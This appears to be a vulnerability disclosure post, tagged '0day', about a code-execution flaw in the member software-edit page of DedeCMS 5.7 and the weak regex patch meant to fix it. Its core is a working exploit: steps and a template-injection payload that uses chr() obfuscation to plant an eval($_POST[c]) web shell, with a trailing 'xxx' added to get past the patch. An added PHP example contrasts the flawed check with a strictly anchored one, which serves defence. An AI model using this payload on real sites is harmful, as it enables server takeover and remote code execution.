[河马] dedecms 5.7 member_soft_edit.php code execution vulnerability (gpc:off)



The 20140228 patch added the following to soft_edit.php:
            if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");
                exit;
            }
I have to ask: what kind of regex is this?

Any single character is enough to make it match.

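Add an uploaded software entry.

Local address: http://www.hao123.com

Fill in the other fields with anything. Once the entry has been added, open its edit page again.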



Change the software address to:
http://www.hao123.com}x{/dede:link}{dede:a text'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx

Note the extra xxx at the end: it is there to get past the regex patch.
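
Why a trailing xxx is enough to pass the patched check, next to a whole-string check, as an added example (not code from the original post or from DedeCMS). patch_check, strict_check, the 255-byte limit and the sample strings are made up here, and the example assumes a software address is a plain http/https/ftp URL:

```php
<?php
// Added example, not DedeCMS code. Function names and samples are hypothetical.

// The check from the 20140228 patch, copied from the post. It has no leading
// anchor, so it passes as soon as the *tail* of the string is made of
// allowed characters; everything before that tail is never inspected.
function patch_check($softurl)
{
    return preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl) === 1;
}

// Stricter check (assumption: the field holds a plain http/https/ftp URL).
// \A and \z anchor the whole string; \z, unlike $, also refuses a trailing
// newline. Template delimiters ({ }) and quotes are not in the allow-list.
function strict_check($softurl)
{
    if (!is_string($softurl) || strlen($softurl) > 255) {   // 255 is an assumed limit
        return false;
    }
    if (preg_match('#\A(?:https?|ftp)://[A-Za-z0-9._~:/?&=%+-]+\z#', $softurl) !== 1) {
        return false;
    }
    // Second opinion from the URL parser: a host part must be present.
    $parts = parse_url($softurl);
    return $parts !== false && !empty($parts['host']);
}

// Constructed sample inputs.
$samples = array(
    'http://www.hao123.com',
    'http://www.hao123.com/a.zip?id=1&k=v',
    'http://www.hao123.com}x{/dede:link}xxx',  // braces inside, allowed tail
    '}{ anything at all a',                    // one allowed last character
    "http://www.hao123.com\n",                 // trailing newline
);

foreach ($samples as $s) {
    printf("%-42s patch=%-6s strict=%s\n",
        json_encode($s),
        patch_check($s) ? 'pass' : 'reject',
        strict_check($s) ? 'pass' : 'reject');
}
```

The patched check passes all five samples; the strict check passes only the first two.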



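After that it executes with no trouble at all!

In later testing, the address that gets written differs between GPC OFF and GPC ON; the one above was written with GPC ON.

You know why.

In filter.inc.php you apply addslashes to everything, regardless of GPC.

And for a $svar[$_k] like this it simply returns the wrong value. I'll leave this bug for you to deal with.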
function _FilterAll($fk, &$svar)
{
    global $cfg_notallowstr,$cfg_replacestr;
    if( is_array($svar) )
    {
        foreach($svar as $_k => $_v)
        {
            $svar[$_k] = _FilterAll($fk,$_v);
        }
    }
    else
    {
        if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))
        {
            ShowMsg(" $fk has not allow words!",'-1');
            exit();
        }
        if($cfg_replacestr!='')
        {
            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
        }
    }
    return addslashes($svar);
}

/* Filter _GET, _POST, _COOKIE */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}






Source: original to this site
Tags: 0day